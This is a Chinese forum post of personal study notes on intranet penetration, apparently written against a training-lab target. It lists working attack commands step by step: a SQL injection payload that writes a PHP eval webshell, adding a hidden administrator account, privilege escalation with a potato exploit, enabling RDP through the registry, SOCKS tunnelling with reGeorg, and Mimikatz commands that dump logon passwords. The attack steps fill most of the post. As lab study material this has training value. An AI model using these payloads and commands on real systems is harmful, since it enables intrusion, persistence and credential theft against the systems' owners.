内网穿透(一)

magiceye   ·   发表于 2022-10-12 08:35:06   ·   学习杂记

内网穿透1
SQL注入写shell into dumpfile/into outfile 导出语句
需要绝对路径 C:\phpStudy\WWW\index.php
and 1=2 union select 1,’<?php eval($_REQUEST[8])?>’ into outfile ‘C:/phpStudy/WWW/wj.php’
webshell =>链接目标远程桌面(完全控制)
1.添加管理员账号
2.确定远程服务开启(没开帮他开)
3.确定可以连接
添加账号:net user abc(账号名) A1B2C3!.Qa(密码) /add
(权限问题,没权限,需要提升权限到管理员权限)
1.windows/Linux系统漏洞提权
2.程序漏洞提权(redis 软件漏洞提权)
3.两个网址,不一样的权限
提权辅助页面https://i.hacking8.com/tiquan/
查看当前电脑(windows)打过的补丁systeminfo
烂土豆.exe -p “whomai” 进行提权,提权完添加账号
烂土地.exe -p “net user abc A1B2C3!Qa /add”
添加管理员账号:烂土地.exe -p “net localgroup administrators abc /add”
查看端口开放情况 netstat -ano(查看3389端口,如果没有开3389端口就帮他开(实际情况是上传CS远控程序
开启:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f)
查看进程 tacklist pid
ping一下知道IP,ping c78exn-5qmtbw.aqlab.cn 然后IP 59.63.166.70远程连接
mstsc
(IP:3389 => 路由器3389 => 端口转发/端口映射
运维知识:路由有个表格,记录了端口之间的对应
3389=> A机器的3389
2024=> B机器的3389 )
那么要怎么找到映射出来的端口需要用到正向连接和反向连接
正向连接:你去找目标
(骚操作 你访问PHP,PHP去访问目标主机)
反向连接:前提条件需要目标有外网 目标访问我的主机,构成连接(反弹shell)需要有公网ip,监听本机端口(目标主机访问端口)
(两边都是内网 内-> 公 交换机(路由) ->安全设备(外紧内松) -> 目标主机)
(正向)上传tunnel.nosocket.php 使用脚本监听本机的一个端口,把你本机发向那个端口的数据发送到其他鸡PHP文件上,再通过其他鸡的PHP文件发送到其他鸡上
本机执行reGeorgSocksProxy.py -l 127.0.0.1 -p 10086 -u http://c78exn-5qmtbw.aqlab.cn/cn/666.php (监听本地的10086端口)
使用proxifier进行全局代理流量转发
然后使用菜刀查看内网IP地址,远程连接10.0.1.4

进入内网,第一步探测内网(拿到目标权限)
cmd命令 或者上传namp、fscan等内网扫描器
端口扫描、目录扫描(遇到不知道的端口查一下,爆破一下)
目前不知道密码,需要去内存里面抓取密码(使用猕猴桃)
cmd以管理员身份运行
cd 路径
猕猴桃.exe
log 日志会记录内容
privilege::debug 提升权限
sekurlsa::logonpasswords 抓取密码
查看Administrator(管理员) 密码
尝试相同账号密码连接内网

打赏我,让我更有动力~

0 条回复   |  直到 2022-10-12 | 870 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.